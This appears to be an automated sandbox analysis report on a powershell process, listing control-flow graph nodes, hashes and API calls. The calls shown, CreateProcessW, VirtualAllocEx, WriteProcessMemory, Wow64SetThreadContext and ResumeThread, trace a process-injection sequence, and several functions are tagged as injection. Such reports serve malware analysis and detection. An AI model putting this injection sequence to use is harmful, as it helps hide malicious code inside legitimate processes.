                                                                • Instruction Fuzzy Hash: 57F0D435A001199FCB15CF9DD990AEEF7B1FF88324F208159E515A72A1C736EC62CB60

                                                                Execution Graph

                                                                Execution Coverage:8.6%
                                                                Dynamic/Decrypted Code Coverage:0%
                                                                Signature Coverage:0%
                                                                Total number of Nodes:21
                                                                Total number of Limit Nodes:4
                                                                execution_graph 15861 29f7bb8 15863 29f7be1 15861->15863 15862 29f7d0c 15863->15862 15865 29fb387 15863->15865 15866 29fb39f 15865->15866 15867 29fb44f 15866->15867 15870 29fb9eb VirtualAllocEx 15866->15870 15872 29fc258 ResumeThread 15866->15872 15867->15863 15871 29fba3e 15870->15871 15873 29fb5ef 15872->15873 15874 29fcd00 15875 29fcd7b CreateProcessW 15874->15875 15877 29fce59 15875->15877 15878 29fd120 15879 29fd168 15878->15879 15880 29fd170 WriteProcessMemory 15878->15880 15879->15880 15881 29fd1ab 15880->15881 15882 29fcf60 15883 29fcfac Wow64SetThreadContext 15882->15883 15884 29fcfa2 15882->15884 15885 29fcfda 15883->15885 15884->15883

                                                                Executed Functions

                                                                Function 06FA18B0 Relevance: 6.4, Strings: 5, Instructions: 155COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 0 6fa18b0-6fa18d3 1 6fa18d9-6fa18de 0->1 2 6fa1aae-6fa1ac6 0->2 3 6fa18e0-6fa18e6 1->3 4 6fa18f6-6fa18fa 1->4 5 6fa18ea-6fa18f4 3->5 6 6fa18e8 3->6 7 6fa1a5b-6fa1a65 4->7 8 6fa1900-6fa1904 4->8 5->4 6->4 11 6fa1a73-6fa1a79 7->11 12 6fa1a67-6fa1a70 7->12 13 6fa1906-6fa1915 8->13 14 6fa1917 8->14 16 6fa1a7b-6fa1a7d 11->16 17 6fa1a7f-6fa1a8b 11->17 18 6fa1919-6fa191b 13->18 14->18 19 6fa1a8d-6fa1aab 16->19 17->19 18->7 20 6fa1921-6fa1941 18->20 26 6fa1943-6fa195e 20->26 27 6fa1960 20->27 28 6fa1962-6fa1964 26->28 27->28 28->7 30 6fa196a-6fa196c 28->30 31 6fa196e-6fa197a 30->31 32 6fa197c 30->32 34 6fa197e-6fa1980 31->34 32->34 34->7 35 6fa1986-6fa19a6 34->35 38 6fa19a8-6fa19ae 35->38 39 6fa19be-6fa19c2 35->39 42 6fa19b2-6fa19b4 38->42 43 6fa19b0 38->43 40 6fa19dc-6fa19e0 39->40 41 6fa19c4-6fa19ca 39->41 46 6fa19e7-6fa19e9 40->46 44 6fa19ce-6fa19da 41->44 45 6fa19cc 41->45 42->39 43->39 44->40 45->40 48 6fa19eb-6fa19f1 46->48 49 6fa1a01-6fa1a58 46->49 51 6fa19f3 48->51 52 6fa19f5-6fa19f7 48->52 51->49 52->49
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2281599779.0000000006FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FA0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_6fa0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 4']q$4']q$$]q$$]q$$]q
                                                                • API String ID: 0-2353078639
                                                                • Opcode ID: 8ca7130df9ac106e65ec198676bc0312d1570b2be5cbe2000d84fa459d2a091c
                                                                • Instruction ID: 94353e8842c80a1294b0ca884f621583fc190794e3d13820ffc8bf90d1856a45
                                                                • Opcode Fuzzy Hash: 8ca7130df9ac106e65ec198676bc0312d1570b2be5cbe2000d84fa459d2a091c
                                                                • Instruction Fuzzy Hash: 0D416C71F043098FDBA4CA39851077AB7EAAF85650F168076D851CF259DB31C948C7A1
                                                                Function 06FA21E0 Relevance: 6.4, Strings: 5, Instructions: 145COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 53 6fa21e0-6fa2206 54 6fa220c-6fa2211 53->54 55 6fa23b2-6fa23d2 53->55 56 6fa2229-6fa222d 54->56 57 6fa2213-6fa2219 54->57 61 6fa235e-6fa2368 56->61 62 6fa2233-6fa2235 56->62 58 6fa221b 57->58 59 6fa221d-6fa2227 57->59 58->56 59->56 65 6fa236a-6fa2373 61->65 66 6fa2376-6fa237c 61->66 63 6fa2237-6fa2243 62->63 64 6fa2245 62->64 68 6fa2247-6fa2249 63->68 64->68 69 6fa237e-6fa2380 66->69 70 6fa2382-6fa238e 66->70 68->61 71 6fa224f-6fa2253 68->71 72 6fa2390-6fa23af 69->72 70->72 73 6fa2266 71->73 74 6fa2255-6fa2264 71->74 77 6fa2268-6fa226a 73->77 74->77 77->61 78 6fa2270-6fa2272 77->78 79 6fa2282 78->79 80 6fa2274-6fa2280 78->80 82 6fa2284-6fa2286 79->82 80->82 82->61 83 6fa228c-6fa228e 82->83 84 6fa22a8-6fa22b3 83->84 85 6fa2290-6fa2296 83->85 88 6fa22c2-6fa22ce 84->88 89 6fa22b5-6fa22b8 84->89 86 6fa229a-6fa22a6 85->86 87 6fa2298 85->87 86->84 87->84 90 6fa22dc-6fa22e3 88->90 91 6fa22d0-6fa22d2 88->91 89->88 93 6fa22ea-6fa22ec 90->93 91->90 94 6fa22ee-6fa22f4 93->94 95 6fa2304-6fa235b 93->95 96 6fa22f8-6fa22fa 94->96 97 6fa22f6 94->97 96->95 97->95
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2281599779.0000000006FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FA0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_6fa0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 4']q$4']q$$]q$$]q$$]q
                                                                • API String ID: 0-2353078639
                                                                • Opcode ID: df1c26c4ce7030fdc0087a96b50ebf0d41f6846bf60ede92a71bb3441660506f
                                                                • Instruction ID: 07c84298afc522ac40e9086716fd1798bd13815368dafe8a56a8850cd0a9ff3b
                                                                • Opcode Fuzzy Hash: df1c26c4ce7030fdc0087a96b50ebf0d41f6846bf60ede92a71bb3441660506f
                                                                • Instruction Fuzzy Hash: 7D412671F10305DFEBA98F69C44066ABBF5FF86610F2C846AC894CB250DB31CA45C7A1
                                                                Function 06FA1890 Relevance: 3.9, Strings: 3, Instructions: 108COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 99 6fa1890-6fa18d3 100 6fa18d9-6fa18de 99->100 101 6fa1aae-6fa1ac6 99->101 102 6fa18e0-6fa18e6 100->102 103 6fa18f6-6fa18fa 100->103 104 6fa18ea-6fa18f4 102->104 105 6fa18e8 102->105 106 6fa1a5b-6fa1a65 103->106 107 6fa1900-6fa1904 103->107 104->103 105->103 110 6fa1a73-6fa1a79 106->110 111 6fa1a67-6fa1a70 106->111 112 6fa1906-6fa1915 107->112 113 6fa1917 107->113 115 6fa1a7b-6fa1a7d 110->115 116 6fa1a7f-6fa1a8b 110->116 117 6fa1919-6fa191b 112->117 113->117 118 6fa1a8d-6fa1aab 115->118 116->118 117->106 119 6fa1921-6fa1941 117->119 125 6fa1943-6fa195e 119->125 126 6fa1960 119->126 127 6fa1962-6fa1964 125->127 126->127 127->106 129 6fa196a-6fa196c 127->129 130 6fa196e-6fa197a 129->130 131 6fa197c 129->131 133 6fa197e-6fa1980 130->133 131->133 133->106 134 6fa1986-6fa19a6 133->134 137 6fa19a8-6fa19ae 134->137 138 6fa19be-6fa19c2 134->138 141 6fa19b2-6fa19b4 137->141 142 6fa19b0 137->142 139 6fa19dc-6fa19e0 138->139 140 6fa19c4-6fa19ca 138->140 145 6fa19e7-6fa19e9 139->145 143 6fa19ce-6fa19da 140->143 144 6fa19cc 140->144 141->138 142->138 143->139 144->139 147 6fa19eb-6fa19f1 145->147 148 6fa1a01-6fa1a58 145->148 150 6fa19f3 147->150 151 6fa19f5-6fa19f7 147->151 150->148 151->148
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2281599779.0000000006FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FA0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_6fa0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 4']q$$]q$$]q
                                                                • API String ID: 0-3019551829
                                                                • Opcode ID: 7da8b8ddd6ca0f733bae179b68c18db49ef5f4b8e328cc33359c481022a3894e
                                                                • Instruction ID: c60ff8016d97be0446ca4affa6f40f250af77a9646e4e0a5dbd7891fadac1a6f
                                                                • Opcode Fuzzy Hash: 7da8b8ddd6ca0f733bae179b68c18db49ef5f4b8e328cc33359c481022a3894e
                                                                • Instruction Fuzzy Hash: EF3138B1E08304CFEBB5CE24861077A7BFAAF85651F1781A6C841DB299D735CA84C7B1
                                                                Function 06FA21DB Relevance: 3.8, Strings: 3, Instructions: 87COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 152 6fa21db-6fa2206 153 6fa220c-6fa2211 152->153 154 6fa23b2-6fa23d2 152->154 155 6fa2229-6fa222d 153->155 156 6fa2213-6fa2219 153->156 160 6fa235e-6fa2368 155->160 161 6fa2233-6fa2235 155->161 157 6fa221b 156->157 158 6fa221d-6fa2227 156->158 157->155 158->155 164 6fa236a-6fa2373 160->164 165 6fa2376-6fa237c 160->165 162 6fa2237-6fa2243 161->162 163 6fa2245 161->163 167 6fa2247-6fa2249 162->167 163->167 168 6fa237e-6fa2380 165->168 169 6fa2382-6fa238e 165->169 167->160 170 6fa224f-6fa2253 167->170 171 6fa2390-6fa23af 168->171 169->171 172 6fa2266 170->172 173 6fa2255-6fa2264 170->173 176 6fa2268-6fa226a 172->176 173->176 176->160 177 6fa2270-6fa2272 176->177 178 6fa2282 177->178 179 6fa2274-6fa2280 177->179 181 6fa2284-6fa2286 178->181 179->181 181->160 182 6fa228c-6fa228e 181->182 183 6fa22a8-6fa22b3 182->183 184 6fa2290-6fa2296 182->184 187 6fa22c2-6fa22ce 183->187 188 6fa22b5-6fa22b8 183->188 185 6fa229a-6fa22a6 184->185 186 6fa2298 184->186 185->183 186->183 189 6fa22dc-6fa22e3 187->189 190 6fa22d0-6fa22d2 187->190 188->187 192 6fa22ea-6fa22ec 189->192 190->189 193 6fa22ee-6fa22f4 192->193 194 6fa2304-6fa235b 192->194 195 6fa22f8-6fa22fa 193->195 196 6fa22f6 193->196 195->194 196->194
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2281599779.0000000006FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FA0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_6fa0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 4']q$$]q$$]q
                                                                • API String ID: 0-3019551829
                                                                • Opcode ID: 86dcd1c3e410a2f31a69cfc3d2fef838e311e3d9686f48176c839149bfa82b24
                                                                • Instruction ID: 18051a929d776fa4da94e8941bdae47902739652f551881d5370f3423f765339
                                                                • Opcode Fuzzy Hash: 86dcd1c3e410a2f31a69cfc3d2fef838e311e3d9686f48176c839149bfa82b24
                                                                • Instruction Fuzzy Hash: EA31F5B2F20305EFEBA88F19C58166977F5BF85611F2D8566CC989B210D731CB41CBA1
                                                                Function 06FA2900 Relevance: 2.6, Strings: 2, Instructions: 141COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 198 6fa2900-6fa2922 199 6fa2928-6fa292d 198->199 200 6fa2acc-6fa2aea 198->200 201 6fa292f-6fa2935 199->201 202 6fa2945-6fa2949 199->202 204 6fa2939-6fa2943 201->204 205 6fa2937 201->205 206 6fa294f-6fa2953 202->206 207 6fa2a74-6fa2a7e 202->207 204->202 205->202 210 6fa2993 206->210 211 6fa2955-6fa2966 206->211 208 6fa2a8c-6fa2a92 207->208 209 6fa2a80-6fa2a89 207->209 214 6fa2a98-6fa2aa4 208->214 215 6fa2a94-6fa2a96 208->215 212 6fa2995-6fa2997 210->212 211->200 220 6fa296c-6fa2971 211->220 212->207 218 6fa299d-6fa29a1 212->218 216 6fa2aa6-6fa2ac9 214->216 215->216 218->207 221 6fa29a7-6fa29ab 218->221 223 6fa2989-6fa2991 220->223 224 6fa2973-6fa2979 220->224 221->207 222 6fa29b1-6fa29d7 221->222 222->207 232 6fa29dd-6fa29e1 222->232 223->212 226 6fa297b 224->226 227 6fa297d-6fa2987 224->227 226->223 227->223 233 6fa29e3-6fa29ec 232->233 234 6fa2a04 232->234 236 6fa29ee-6fa29f1 233->236 237 6fa29f3-6fa2a00 233->237 235 6fa2a07-6fa2a14 234->235 239 6fa2a1a-6fa2a71 235->239 238 6fa2a02 236->238 237->238 238->235
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2281599779.0000000006FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FA0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_6fa0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: (o]q$(o]q
                                                                • API String ID: 0-1858875562
                                                                • Opcode ID: 0cfdd4a040a77864a233935cd47949bae66dbee20f7d1348bc53203c4bbdeef3
                                                                • Instruction ID: f27cb8138b10415f70c63636f93013e4e96175775b4ce1f94a41672fdcd6f12e
                                                                • Opcode Fuzzy Hash: 0cfdd4a040a77864a233935cd47949bae66dbee20f7d1348bc53203c4bbdeef3
                                                                • Instruction Fuzzy Hash: A5410671F04305CFDBA88F68C8447AA7BB2BF89710F18856AE515CB295C731DA54CBA1
                                                                Function 06FA2598 Relevance: 2.6, Strings: 2, Instructions: 120COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 242 6fa2598-6fa25ba 243 6fa25c0-6fa25c5 242->243 244 6fa2737-6fa2741 242->244 245 6fa25dd-6fa25e9 243->245 246 6fa25c7-6fa25cd 243->246 251 6fa25ef-6fa25f2 245->251 252 6fa26e2-6fa26ec 245->252 247 6fa25cf 246->247 248 6fa25d1-6fa25db 246->248 247->245 248->245 251->252 254 6fa25f8-6fa25ff 251->254 255 6fa26fa-6fa2700 252->255 256 6fa26ee-6fa26f7 252->256 254->244 259 6fa2605-6fa260a 254->259 257 6fa2702-6fa2704 255->257 258 6fa2706-6fa2712 255->258 260 6fa2714-6fa2734 257->260 258->260 261 6fa260c-6fa2612 259->261 262 6fa2622-6fa2626 259->262 264 6fa2616-6fa2620 261->264 265 6fa2614 261->265 262->252 266 6fa262c-6fa2630 262->266 264->262 265->262 268 6fa2632-6fa264e 266->268 269 6fa2650 266->269 270 6fa2652-6fa2654 268->270 269->270 270->252 272 6fa265a-6fa2667 270->272 277 6fa266e-6fa2670 272->277 278 6fa2688-6fa26df 277->278 279 6fa2672-6fa2678 277->279 280 6fa267a 279->280 281 6fa267c-6fa267e 279->281 280->278 281->278
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2281599779.0000000006FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FA0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_6fa0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 4']q$4']q
                                                                • API String ID: 0-3120983240
                                                                • Opcode ID: 8d320d9da41b48a8dff7752ca51bb38791815e9fd8c3f401a95b87ddf3821122
                                                                • Instruction ID: eca5d6f8aef9240980036075def1e3a50db8e14292c44b88a5a17ac2fed6c215
                                                                • Opcode Fuzzy Hash: 8d320d9da41b48a8dff7752ca51bb38791815e9fd8c3f401a95b87ddf3821122
                                                                • Instruction Fuzzy Hash: 8A41F271F01309CFCB989F69C56066ABBE6BF85610F28847AD445CB310DB30CA85CB91
                                                                Function 029FCCF4 Relevance: 1.7, APIs: 1, Instructions: 155processCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 283 29fccf4-29fcd79 285 29fcd7b-29fcd7e 283->285 286 29fcd81-29fcd88 283->286 285->286 287 29fcd8a-29fcd90 286->287 288 29fcd93-29fcda9 286->288 287->288 289 29fcdab-29fcdb1 288->289 290 29fcdb4-29fce57 CreateProcessW 288->290 289->290 292 29fce59-29fce5f 290->292 293 29fce60-29fced8 290->293 292->293 300 29fceea-29fcef1 293->300 301 29fceda-29fcee0 293->301 302 29fcf08 300->302 303 29fcef3-29fcf02 300->303 301->300 305 29fcf09 302->305 303->302 305->305
                                                                APIs
                                                                • CreateProcessW.KERNEL32(00000000,?,00000009,?,?,?,?,?,?,?), ref: 029FCE44
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2235295706.00000000029F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_29f0000_powershell.jbxd
                                                                Similarity
                                                                • API ID: CreateProcess
                                                                • String ID:
                                                                • API String ID: 963392458-0
                                                                • Opcode ID: c9f052a0d383c2fc8025517227fd5f74d3fcf466ea9abdbd7099c2c5d7f123b7
                                                                • Instruction ID: d567880d6a8d17c0beadef934b9c625c19a7f74814416d221a46ed953fff7a59
                                                                • Opcode Fuzzy Hash: c9f052a0d383c2fc8025517227fd5f74d3fcf466ea9abdbd7099c2c5d7f123b7
                                                                • Instruction Fuzzy Hash: 27512871901219DFDB64CF99C940BDDBBB5BF48304F1080AAE909B7250D7359A89CF50
                                                                Function 029FCD00 Relevance: 1.7, APIs: 1, Instructions: 153processCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 306 29fcd00-29fcd79 307 29fcd7b-29fcd7e 306->307 308 29fcd81-29fcd88 306->308 307->308 309 29fcd8a-29fcd90 308->309 310 29fcd93-29fcda9 308->310 309->310 311 29fcdab-29fcdb1 310->311 312 29fcdb4-29fce57 CreateProcessW 310->312 311->312 314 29fce59-29fce5f 312->314 315 29fce60-29fced8 312->315 314->315 322 29fceea-29fcef1 315->322 323 29fceda-29fcee0 315->323 324 29fcf08 322->324 325 29fcef3-29fcf02 322->325 323->322 327 29fcf09 324->327 325->324 327->327
                                                                APIs
                                                                • CreateProcessW.KERNEL32(00000000,?,00000009,?,?,?,?,?,?,?), ref: 029FCE44
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2235295706.00000000029F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_29f0000_powershell.jbxd
                                                                Similarity
                                                                • API ID: CreateProcess
                                                                • String ID:
                                                                • API String ID: 963392458-0
                                                                • Opcode ID: 2b8c319320fec9a6fe8ba5624f9f24083b66d101112825df70abdee4eca17ab1
                                                                • Instruction ID: b12e1e0b77f4fb54e8da0513d8d6250ce5ccd4042b602ebcd5d574fbe64f3928
                                                                • Opcode Fuzzy Hash: 2b8c319320fec9a6fe8ba5624f9f24083b66d101112825df70abdee4eca17ab1
                                                                • Instruction Fuzzy Hash: 725126B1901229DFDF64CF99C940BDDBBB5BF48304F1084AAE909B7250D7359A89CF60
                                                                Function 029FD118 Relevance: 1.6, APIs: 1, Instructions: 63injectionCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 328 29fd118-29fd166 329 29fd168-29fd16e 328->329 330 29fd170-29fd1a9 WriteProcessMemory 328->330 329->330 331 29fd1ab-29fd1b1 330->331 332 29fd1b2-29fd1d3 330->332 331->332
                                                                APIs
                                                                • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 029FD19C
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2235295706.00000000029F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_29f0000_powershell.jbxd
                                                                Similarity
                                                                • API ID: MemoryProcessWrite
                                                                • String ID:
                                                                • API String ID: 3559483778-0
                                                                • Opcode ID: cd0e4d2a86be68e0089ca70fadd185151c8e00a2d9c5d4f667939ac7928a1237
                                                                • Instruction ID: 56c8ff6882aa2ba6cb6e89424cadf564a4cb545fbf19408cd03a3892663b560e
                                                                • Opcode Fuzzy Hash: cd0e4d2a86be68e0089ca70fadd185151c8e00a2d9c5d4f667939ac7928a1237
                                                                • Instruction Fuzzy Hash: 842107B5900349DFDB50CF9AC984BDEBBF4FB48320F14842AE518A7250D3789944CFA1
                                                                Function 029FD120 Relevance: 1.6, APIs: 1, Instructions: 60injectionCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 334 29fd120-29fd166 335 29fd168-29fd16e 334->335 336 29fd170-29fd1a9 WriteProcessMemory 334->336 335->336 337 29fd1ab-29fd1b1 336->337 338 29fd1b2-29fd1d3 336->338 337->338
                                                                APIs
                                                                • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 029FD19C
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2235295706.00000000029F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_29f0000_powershell.jbxd
                                                                Similarity
                                                                • API ID: MemoryProcessWrite
                                                                • String ID:
                                                                • API String ID: 3559483778-0
                                                                • Opcode ID: 4536fa605540228de5e22d407d80aa2aa3723c47320e824e65179734c876eedc
                                                                • Instruction ID: 918b30c0e0039e2c8636d4c5c9d2c341605ea363140bebc2201a23452022177b
                                                                • Opcode Fuzzy Hash: 4536fa605540228de5e22d407d80aa2aa3723c47320e824e65179734c876eedc
                                                                • Instruction Fuzzy Hash: 8421E8B19013199FDB50CF9AD984BDEBBF8FB48320F50842AE518A7210D378A944CFA5
                                                                Function 029FCF59 Relevance: 1.6, APIs: 1, Instructions: 55threadCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 340 29fcf59-29fcfa0 341 29fcfac-29fcfd8 Wow64SetThreadContext 340->341 342 29fcfa2-29fcfaa 340->342 343 29fcfda-29fcfe0 341->343 344 29fcfe1-29fd002 341->344 342->341 343->344
                                                                APIs
                                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 029FCFCB
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2235295706.00000000029F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_29f0000_powershell.jbxd
                                                                Similarity
                                                                • API ID: ContextThreadWow64
                                                                • String ID:
                                                                • API String ID: 983334009-0
                                                                • Opcode ID: b31b562a9d5163fc0d69cb903e9517d7cee1aa426e93972481ddd44a375912f8
                                                                • Instruction ID: 52ee28ef81fd6582ceeb921ddb4a54add12671395746afc90056210bdec50db6
                                                                • Opcode Fuzzy Hash: b31b562a9d5163fc0d69cb903e9517d7cee1aa426e93972481ddd44a375912f8
                                                                • Instruction Fuzzy Hash: 8811F3B2D002498FDB50CF9AC944BDEFBF5AB88320F15C42AE558A3650D378A645CFA5
                                                                Function 029FCF60 Relevance: 1.6, APIs: 1, Instructions: 54threadCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 346 29fcf60-29fcfa0 347 29fcfac-29fcfd8 Wow64SetThreadContext 346->347 348 29fcfa2-29fcfaa 346->348 349 29fcfda-29fcfe0 347->349 350 29fcfe1-29fd002 347->350 348->347 349->350
                                                                APIs
                                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 029FCFCB
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2235295706.00000000029F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_29f0000_powershell.jbxd
                                                                Similarity
                                                                • API ID: ContextThreadWow64
                                                                • String ID:
                                                                • API String ID: 983334009-0
                                                                • Opcode ID: e865257c1614a6b645ddb10ca70beac5c99273a3a96a505db716e24a46d378d0
                                                                • Instruction ID: 7c4ee23208ace9b663a17cc16e68e3a5dc7a7d056637546925e7943947a2737a
                                                                • Opcode Fuzzy Hash: e865257c1614a6b645ddb10ca70beac5c99273a3a96a505db716e24a46d378d0
                                                                • Instruction Fuzzy Hash: E611F3B2D002498FDB50CF9AC944BDEFBF8EB88320F15C42AE558A3600D378A545CFA5
                                                                Function 029FC258 Relevance: 1.5, APIs: 1, Instructions: 25threadCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 352 29fc258-29fc299 ResumeThread 353 29fc29b-29fc2a1 352->353 354 29fc2a2-29fc2af 352->354 353->354 355 29fb656-29fb665 354->355 356 29fc2b5 354->356 357 29fb5ef-29fb5f2 355->357 359 29fb5f8 357->359 360 29fc766-29fc76b 357->360 359->355 361 29fc77b-29fc7a6 360->361 362 29fc8f4-29fc8f7 360->362 376 29fc7a8-29fc7b3 361->376 377 29fc757 361->377 363 29fc8f9 362->363 364 29fc900-29fc905 362->364 363->361 366 29fc75c-29fc761 363->366 367 29fc8cb-29fc8df 363->367 368 29fc7e5-29fc7fe 363->368 369 29fc870-29fc89e 363->369 364->357 366->357 367->357 370 29fc8e5-29fc8e8 367->370 368->357 371 29fc804-29fc806 368->371 369->357 374 29fc8a4 369->374 370->357 371->357 374->357 376->357 377->366
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2235295706.00000000029F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_29f0000_powershell.jbxd
                                                                Similarity
                                                                • API ID: ResumeThread
                                                                • String ID:
                                                                • API String ID: 947044025-0
                                                                • Opcode ID: 14efc86d86cd2b4568e15c2902186589f0c36e20eddb1d88b7b5078b2055a4f5
                                                                • Instruction ID: 5e71f5216936e823db3e7d7eed099358f5a43ae6061317b76f79e7053504bedf
                                                                • Opcode Fuzzy Hash: 14efc86d86cd2b4568e15c2902186589f0c36e20eddb1d88b7b5078b2055a4f5
                                                                • Instruction Fuzzy Hash: E5F01D74904358CBDBE18F54C9483D9BBB5AB19328F64C5CAD64E67290C7B98AC8CF12
                                                                Function 029FB9EB Relevance: 1.5, APIs: 1, Instructions: 22memoryCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 378 29fb9eb-29fba3c VirtualAllocEx 379 29fba3e-29fba44 378->379 380 29fba45-29fba52 378->380 379->380
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2235295706.00000000029F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_29f0000_powershell.jbxd
                                                                Similarity
                                                                • API ID: AllocVirtual
                                                                • String ID:
                                                                • API String ID: 4275171209-0
                                                                • Opcode ID: 4e2698e11f04752f8232bbe371932062967e22da40ac240805a3a8f7650cf901
                                                                • Instruction ID: 5c4b3089472ad420b3ccb25b72ba8493f3572c6271a2e11ce0351e8f19c689eb
                                                                • Opcode Fuzzy Hash: 4e2698e11f04752f8232bbe371932062967e22da40ac240805a3a8f7650cf901
                                                                • Instruction Fuzzy Hash: DDF0DAB0905358DFDBA19F54CC58B98BBF5AB18348F10C0C9E64DA7290C7B94AC5CF15
                                                                Function 06FA0480 Relevance: 1.4, Strings: 1, Instructions: 131COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2281599779.0000000006FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FA0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_6fa0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: $]q
                                                                • API String ID: 0-1007455737
                                                                • Opcode ID: 2d245cd33d7c1d6d46024cef1eef8d5aaf9c4fb7dcaa82153af0002d952f011c
                                                                • Instruction ID: 715e42c428f76b2b3311da92908ff392c4995add46a404a8fdd48c3cecd9936d
                                                                • Opcode Fuzzy Hash: 2d245cd33d7c1d6d46024cef1eef8d5aaf9c4fb7dcaa82153af0002d952f011c
                                                                • Instruction Fuzzy Hash: 7D41B675F003099FE764DE58E950A2AB7AAFFC4614B14C469E8198B355CF32DC41C791
                                                                Function 06FA0463 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2281599779.0000000006FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FA0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_6fa0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: $]q
                                                                • API String ID: 0-1007455737
                                                                • Opcode ID: 662da16a955221b0633be1f8647f30d293f3d26f93fa74548034c400eb59321a
